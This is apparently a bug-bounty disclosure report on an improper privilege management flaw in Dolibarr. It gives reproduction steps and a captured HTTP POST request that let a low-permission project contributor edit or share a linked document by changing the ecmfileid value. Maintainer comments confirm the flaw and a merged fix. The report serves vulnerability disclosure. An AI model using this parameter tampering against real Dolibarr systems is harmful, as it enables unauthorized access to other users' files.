Improper Privilege Management in dolibarr/dolibarr


Reported on

May 19th 2021


unprivileged user can edit/share linked file of a project .



1. From admin account add user B as normal user .
now give user B bellow permission for project module.
---->Read projects and tasks (shared project and projects I'm contact for). Can also enter time consumed, for me or my hierarchy, on assigned tasks (Timesheet)
2. Now from admin account goto https://localhost/dolibarr/htdocs/projet/index.php?mainmenu=project&leftmenu= and create a project.
now add user B to this project a contributor .
Also upload a file there .

3. Finally goto user B account and visit above project .Here user B cant edit above uploaded document .

Now user B sent bellow request in burpsuite to edit/share the document .

POST /dolibarr/htdocs/projet/document.php?&id=1&file=PJ2105-0001 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 275
Origin: http://localhost
Connection: close
Referer: http://localhost/dolibarr/htdocs/projet/document.php?action=editfile&urlfile=PJ2105-0001%2FPJ2105-0001-simple.html.noexe&id=1&file=PJ2105-0001&page_y=504
Cookie: DOLSESSID_0553a67aec6c8cfb8172aadb09812143=4ueq8h2hcsro2cicatu2umspk9
Upgrade-Insecure-Requests: 1


here in this postdata you change ecmfileid parameter value to your file id

💥 Impact

privilege escalation bug

6 months ago


Some fixes were done on issues related to similar troubles. I am not sure this is fixed. Will need to recheck once v14 has been released or on develop branch after the 22th of may 2021.

Laurent Destailleur validated this vulnerability a month ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
Laurent Destailleur confirmed that a fix has been merged on ad2e56 a month ago
Laurent Destailleur has been awarded the fix bounty